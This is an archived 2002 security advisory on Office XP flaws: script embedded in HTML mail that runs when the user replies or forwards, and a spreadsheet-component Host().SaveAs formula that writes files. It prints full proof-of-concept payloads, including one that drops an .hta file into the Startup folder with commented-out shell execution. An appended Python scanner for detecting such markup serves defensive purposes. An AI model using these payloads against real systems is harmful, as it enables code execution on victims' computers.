2nd Apr 2002 [SBWID-5221]
COMMAND
bug in ms spreadsheet component and insertion of active component in
HTML mail
SYSTEMS AFFECTED
Office XP
PROBLEM
Update (04 April 2002) section 3 was added
======
Georgi Guninski, in his security advisory #53, 2002
[http://www.guninski.com/m$oxp-2.html], found the following bugs regarding
Office XP:
Legal Notice:
This Advisory is Copyright (c) 2002 Georgi Guninski.
You may distribute it unmodified.
You may not modify it and distribute it or distribute parts
of it without the author's written permission.
If you want to link to this content use the URL:
http://www.guninski.com/m$oxp-2.html
Disclaimer:
The information in this advisory is believed to be true though
it may be false.
The opinions expressed in this advisory and program are my own and
not of any company. The usual standard disclaimer applies,
especially the fact that Georgi Guninski is not liable for any damages
caused by direct or indirect use of the information or functionality
provided by this advisory or program. Georgi Guninski bears no
responsibility for content or misuse of this advisory or program or
any derivatives thereof.
Description:
Actually there are at least three vulnerabilities in Office XP.
1. It is possible to embed active content (object + script) in HTML
mail which is triggered if the user chooses reply or forward to the
mail. This opens an exploit scenario for forcing the user to visit a
page in the internet zone of IE at least. For another exploit scenario
check (2)
2. There is a bug in ms spreadsheet component. Namely in its Host()
function which may be exploited with the help of (1) or probably from
any document opened with Office application. This buggy function allows
creating files with arbitrary names and their content may be specified
to some extent, which is sufficient to place an executable file
(.hta) in user's startup directory which may lead to taking full
control over user's computer.
This probably may be called cross application scripting because one
application uses object from another application.
Details:
The following must be put in HTML email which should be opened with
Outlook XP and the user should choose reply or forward.
1.
--------------------------------------
<OBJECT id=WebBrowser1 height=150 width=300
classid=CLSID:8856F961-340A-11D0-A96B-00C04FD705A2>
<PARAM NAME="ExtentX" VALUE="7938">
<PARAM NAME="ExtentY" VALUE="3969">
<PARAM NAME="ViewMode" VALUE="0">
<PARAM NAME="Offline" VALUE="0">
<PARAM NAME="Silent" VALUE="0">
<PARAM NAME="RegisterAsBrowser" VALUE="1">
<PARAM NAME="RegisterAsDropTarget" VALUE="1">
<PARAM NAME="AutoArrange" VALUE="0">
<PARAM NAME="NoClientEdge" VALUE="0">
<PARAM NAME="AlignLeft" VALUE="0">
<PARAM NAME="ViewID" VALUE="{0057D0E0-3573-11CF-AE69-08002B2E1262}">
<PARAM NAME="Location" VALUE="about:/dev/random<script>while (42) alert('HOHOHO\nTrying to sell trustworthy computing\nHOHOHO')</script>">
<PARAM NAME="ReadyState" VALUE="4">
</OBJECT>
-------------------------------------
2.
The office spreadsheet component is something like mini excel. It may
be embedded in web pages (seems not exploitable) and in office documents
(seems exploitable). It supports the Host() function which returns the
hosting object. So if you put in a formula '=Host().SaveAs("name")',
a file with that name shall be created.
[Note, lines may be wrapped]
---------------------------------------
<h1>
Hehe. Triyng to sell trustworthy computing.
</h1>
<object
classid="CLSID:0002E551-0000-0000-C000-000000000046" id=Spreadsheet1
v:shapes="_x0000_s1026" class=shape width=81 height=81
u1:shapes="_x0000_s1025">
<param name=DataType value=XMLURL>
<param name=XMLData
value="<?xml version="1.0"?>
<ss:Workbook xmlns:o="urn:schemas-microsoft-com:office:office"
xmlns:x="urn:schemas-microsoft-com:office:excel"
xmlns:ss="urn:schemas-microsoft-com:office:spreadsheet"
xmlns:c="urn:schemas-microsoft-com:office:component:spreadsheet"
xmlns:html="http://www.w3.org/TR/REC-html40">
<x:ExcelWorkbook>
<x:ProtectStructure>False</x:ProtectStructure>
<x:ActiveSheet>0</x:ActiveSheet>
</x:ExcelWorkbook>
<ss:Styles>
<ss:Style
ss:ID="Default">
<ss:Alignment ss:Horizontal="Automatic" ss:Rotate="0.0" ss:Vertical="Bottom"
ss:ReadingOrder="Context"/>
<ss:Borders>
</ss:Borders>
<ss:Font ss:FontName="Arial" ss:Size="10" ss:Color="Automatic" ss:Bold="0"
ss:Italic="0"
ss:Underline="None"/>
<ss:Interior ss:Color="Automatic" ss:Pattern="None"/>
<ss:NumberFormat ss:Format="General"/>
<ss:Protection
ss:Protected="1"/>
</ss:Style>
</ss:Styles>
<c:ComponentOptions>
<c:Label>
<c:Caption>Microsoft Office Spreadsheet</c:Caption>
</c:Label>
<c:PreventPropBrowser/>
<c:MaxHeight>80%</c:MaxHeight>
<c:MaxWidth>80%</c:MaxWidth>
<c:NextSheetNumber>1</c:NextSheetNumber>
</c:ComponentOptions>
<x:WorkbookOptions>
<c:OWCVersion>10.0.0.2621 </c:OWCVersion>
<x:DisableUndo/>
</x:WorkbookOptions>
<ss:Worksheet
ss:Name="Sheet1">
<x:WorksheetOptions>
<x:Selected/>
<x:ViewableRange>R1:R262144</x:ViewableRange>
<x:Selection>R1C1</x:Selection>
<x:TopRowVisible>0</x:TopRowVisible>
<x:LeftColumnVisible>0</x:LeftColumnVisible>
<x:ProtectContents>False</x:ProtectContents>
</x:WorksheetOptions>
<c:WorksheetOptions>
</c:WorksheetOptions>
<ss:Table ss:ExpandedColumnCount="1" ss:ExpandedRowCount="1"
ss:DefaultColumnWidth="48.0"
ss:DefaultRowHeight="12.75">
<ss:Row>
<ss:Cell ss:Formula='=HOST().SaveAs("C:\GGGG5")'>
<ss:Data ss:Type="Boolean">1</ss:Data>
</ss:Cell>
</ss:Row>
</ss:Table>
</ss:Worksheet>
<ss:Worksheet ss:Name="Sheet2">
<x:WorksheetOptions>
<x:ViewableRange>R1:R262144</x:ViewableRange>
<x:Selection>R1C1</x:Selection>
<x:TopRowVisible>0</x:TopRowVisible>
<x:LeftColumnVisible>0</x:LeftColumnVisible>
<x:ProtectContents>False</x:ProtectContents>
</x:WorksheetOptions>
<c:WorksheetOptions>
</c:WorksheetOptions>
</ss:Worksheet>
<ss:Worksheet ss:Name="Sheet3">
<x:WorksheetOptions>
<x:ViewableRange>R1:R262144</x:ViewableRange>
<x:Selection>R1C1</x:Selection>
<x:TopRowVisible>0</x:TopRowVisible>
<x:LeftColumnVisible>0</x:LeftColumnVisible>
<x:ProtectContents>False</x:ProtectContents>
</x:WorksheetOptions>
<c:WorksheetOptions>
</c:WorksheetOptions>
</ss:Worksheet>
<o:DocumentProperties>
<o:Author>ad</o:Author>
<o:LastAuthor>ad</o:LastAuthor>
<o:Created>2002-03-17T12:07:37Z</o:Created>
<o:Company>g</o:Company>
<o:Version>10.2625</o:Version>
</o:DocumentProperties>
<o:OfficeDocumentSettings>
<o:DownloadComponents/>
<o:LocationOfComponents HRef="file:///E:\"/>
</o:OfficeDocumentSettings>
</ss:Workbook>
">
<param name=AllowPropertyToolbox value=0>
<param name=AutoFit value=0>
<param name=Calculation value=-4105>
<param name=Caption value="Microsoft Office Spreadsheet">
<param name=DisplayColumnHeadings value=-1>
<param name=DisplayGridlines value=-1>
<param name=DisplayHorizontalScrollBar value=-1>
<param name=DisplayOfficeLogo value=-1>
<param name=DisplayPropertyToolbox value=0>
<param name=DisplayRowHeadings value=-1>
<param name=DisplayTitleBar value=0>
<param name=DisplayToolbar value=-1>
<param name=DisplayVerticalScrollBar value=-1>
<param name=DisplayWorkbookTabs value=-1>
<param name=EnableEvents value=-1>
<param name=MaxHeight value="80%">
<param name=MaxWidth value="80%">
<param name=MoveAfterReturn value=-1>
<param name=MoveAfterReturnDirection value=-4121>
<param name=RightToLeft value=0>
<param name=ScreenUpdating value=-1>
<param name=EnableUndo value=0>
</object>
---------------------------------
3. The following must be put in HTML email which should be opened with
Outlook XP and the user should choose reply or forward. Probably it may
also be embedded in .doc or .xls file. The effect is shown after the
user logs out and logs in again.
----------------------------------------
<h1>
Hehe. Trying to sell trustworthy computing.
</h1>
<object
classid="CLSID:0002E551-0000-0000-C000-000000000046" id=Spreadsheet1
v:shapes="_x0000_s1026" class=shape width=81 height=81
u1:shapes="_x0000_s1025">
<param name=DataType value=XMLURL>
<param name=XMLData
value="<?xml version="1.0"?>
<ss:Workbook xmlns:o="urn:schemas-microsoft-com:office:office"
xmlns:x="urn:schemas-microsoft-com:office:excel"
xmlns:ss="urn:schemas-microsoft-com:office:spreadsheet"
xmlns:c="urn:schemas-microsoft-com:office:component:spreadsheet"
xmlns:html="http://www.w3.org/TR/REC-html40">
<x:ExcelWorkbook>
<x:ProtectStructure>False</x:ProtectStructure>
<x:ActiveSheet>0</x:ActiveSheet>
</x:ExcelWorkbook>
<ss:Styles>
<ss:Style
ss:ID="Default">
<ss:Alignment ss:Horizontal="Automatic" ss:Rotate="0.0" ss:Vertical="Bottom"
ss:ReadingOrder="Context"/>
<ss:Borders>
</ss:Borders>
<ss:Font ss:FontName="Arial" ss:Size="10" ss:Color="Automatic" ss:Bold="0"
ss:Italic="0"
ss:Underline="None"/>
<ss:Interior ss:Color="Automatic" ss:Pattern="None"/>
<ss:NumberFormat ss:Format="General"/>
<ss:Protection
ss:Protected="1"/>
</ss:Style>
</ss:Styles>
<c:ComponentOptions>
<c:Label>
<c:Caption>Microsoft Office Spreadsheet</c:Caption>
</c:Label>
<c:PreventPropBrowser/>
<c:MaxHeight>80%</c:MaxHeight>
<c:MaxWidth>80%</c:MaxWidth>
<c:NextSheetNumber>1</c:NextSheetNumber>
</c:ComponentOptions>
<x:WorkbookOptions>
<c:OWCVersion>10.0.0.2621 </c:OWCVersion>
<x:DisableUndo/>
</x:WorkbookOptions>
<ss:Worksheet
ss:Name="Sheet1">
<x:WorksheetOptions>
<x:Selected/>
<x:ViewableRange>R1:R262144</x:ViewableRange>
<x:Selection>R1C1</x:Selection>
<x:TopRowVisible>0</x:TopRowVisible>
<x:LeftColumnVisible>0</x:LeftColumnVisible>
<x:ProtectContents>False</x:ProtectContents>
</x:WorksheetOptions>
<c:WorksheetOptions>
</c:WorksheetOptions>
<ss:Table ss:ExpandedColumnCount="1" ss:ExpandedRowCount="1"
ss:DefaultColumnWidth="48.0"
ss:DefaultRowHeight="12.75">
<ss:Row>
<ss:Cell ss:Formula='=HOST().SaveAs("../Start Menu/Programs/StartUp/gggg5.hta",8)'>
<ss:Data
ss:Type="Boolean">1</ss:Data>
</ss:Cell>
</ss:Row>
</ss:Table>
</ss:Worksheet>
<ss:Worksheet ss:Name="Sheet2">
<x:WorksheetOptions>
<x:ViewableRange>R1:R262144</x:ViewableRange>
<x:Selection>R1C1</x:Selection>
<x:TopRowVisible>0</x:TopRowVisible>
<x:LeftColumnVisible>0</x:LeftColumnVisible>
<x:ProtectContents>False</x:ProtectContents>
</x:WorksheetOptions>
<c:WorksheetOptions>
</c:WorksheetOptions>
</ss:Worksheet>
<ss:Worksheet ss:Name="Sheet3">
<x:WorksheetOptions>
<x:ViewableRange>R1:R262144</x:ViewableRange>
<x:Selection>R1C1</x:Selection>
<x:TopRowVisible>0</x:TopRowVisible>
<x:LeftColumnVisible>0</x:LeftColumnVisible>
<x:ProtectContents>False</x:ProtectContents>
</x:WorksheetOptions>
<c:WorksheetOptions>
</c:WorksheetOptions>
</ss:Worksheet>
<o:DocumentProperties>
<o:Author>ad</o:Author>
<o:LastAuthor>ad</o:LastAuthor>
<o:Created>2002-03-17T12:07:37Z</o:Created>
<o:Company>g</o:Company>
<o:Version>10.2625</o:Version>
</o:DocumentProperties>
<o:OfficeDocumentSettings>
<o:DownloadComponents/>
<o:LocationOfComponents HRef="file:///E:\"/>
</o:OfficeDocumentSettings>
</ss:Workbook>
">
<param name=AllowPropertyToolbox value=0>
<param name=AutoFit value=0>
<param name=Calculation value=-4105>
<param name=Caption value="Microsoft Office Spreadsheet">
<param name=DisplayColumnHeadings value=-1>
<param name=DisplayGridlines value=-1>
<param name=DisplayHorizontalScrollBar value=-1>
<param name=DisplayOfficeLogo value=-1>
<param name=DisplayPropertyToolbox value=0>
<param name=DisplayRowHeadings value=-1>
<param name=DisplayTitleBar value=0>
<param name=DisplayToolbar value=-1>
<param name=DisplayVerticalScrollBar value=-1>
<param name=DisplayWorkbookTabs value=-1>
<param name=EnableEvents value=-1>
<param name=MaxHeight value="80%">
<param name=MaxWidth value="80%">
<param name=MoveAfterReturn value=-1>
<param name=MoveAfterReturnDirection value=-4121>
<param name=RightToLeft value=0>
<param name=ScreenUpdating value=-1>
<param name=EnableUndo value=0>
</object>
<script>
i=3;
while (i--) confirm("Trustworthy?");
//x=new ActiveXObject("WScript.Shell");
//x.Run("C:\\WINNT\\SYSTEM32\\CMD.EXE /C DIR C:\\ /a /p /s");
</script>
------------------------------------------
SOLUTION
Workaround/Solution: The solution is to get a real mail client and
office applications. Workaround for this particular problem is: For (1)
- disable everything that contains "active" in IE. For (2) - (Have
not tested it personally) Deregister and delete the ms office
spreadsheet component
Vendor status:
Microsoft was notified on 17 March 2002. They had 2 weeks to produce a
patch but didn't.
Regards,
Georgi Guninski
http://www.guninski.com
Update (04 April 2002)
======
Ben Schorr adds :
To work-around this problem in Outlook go to Tools | Options | Mail
Format and uncheck the boxes for "Use Word to..." That will cause
Outlook to use its own native editor for such things and shuts the
window on this exploit.
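
A defensive check for the markup described above, as an added example that is not part of the advisory or of this archive page: a Python scanner a mail filter could run over an HTML body to flag embedded objects (labelling the two CLSIDs quoted in the advisory), script, and spreadsheet formulas that call Host(). The function and class names, the labels and the sample body are assumptions constructed for illustration.

```python
from html.parser import HTMLParser
import re

# CLSIDs copied from the two <object> tags quoted in the advisory.
FLAGGED_CLSIDS = {
    "8856F961-340A-11D0-A96B-00C04FD705A2": "WebBrowser control",
    "0002E551-0000-0000-C000-000000000046": "Office spreadsheet component",
}
# A formula that reaches the hosting object, e.g. =HOST().SaveAs(...)
HOST_CALL = re.compile(r"=\s*HOST\s*\(\s*\)\s*\.\s*(\w+)", re.IGNORECASE)

class ActiveContentScanner(HTMLParser):
    """Records embedded objects, script and Host() formulas in an HTML body."""

    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self.findings.append(("script", "script element"))
        for name, value in attrs:
            value = value or ""
            if tag == "object" and name == "classid":
                clsid = value.upper().replace("CLSID:", "").strip("{} ")
                label = FLAGGED_CLSIDS.get(clsid, "unlisted control")
                self.findings.append(("object", f"{clsid} ({label})"))
            # Workbook XML rides inside a param value (or, when the quoting is
            # sloppy, parses as tags of its own), so check every attribute.
            for m in HOST_CALL.finditer(value):
                self.findings.append(("host-formula", f"HOST().{m.group(1)}"))
            if "<script" in value.lower():
                self.findings.append(("script", f"script inside {tag} attribute"))

def scan_html_mail(body):
    """Return a list of (kind, detail) findings for one HTML mail body."""
    scanner = ActiveContentScanner()
    scanner.feed(body)
    scanner.close()
    return scanner.findings

# Constructed sample: inert markup shaped like the advisory's second example.
SAMPLE = """<p>Quarterly numbers attached.</p>
<object classid="CLSID:0002E551-0000-0000-C000-000000000046" id=Spreadsheet1>
<param name=XMLData value="&lt;ss:Cell ss:Formula='=HOST().SaveAs(&quot;placeholder.txt&quot;)'/&gt;">
</object>"""

if __name__ == "__main__":
    for kind, detail in scan_html_mail(SAMPLE):
        print(f"{kind:13} {detail}")
```

Any finding is a reason to quarantine the message or strip the element before delivery; plain HTML mail produces an empty list.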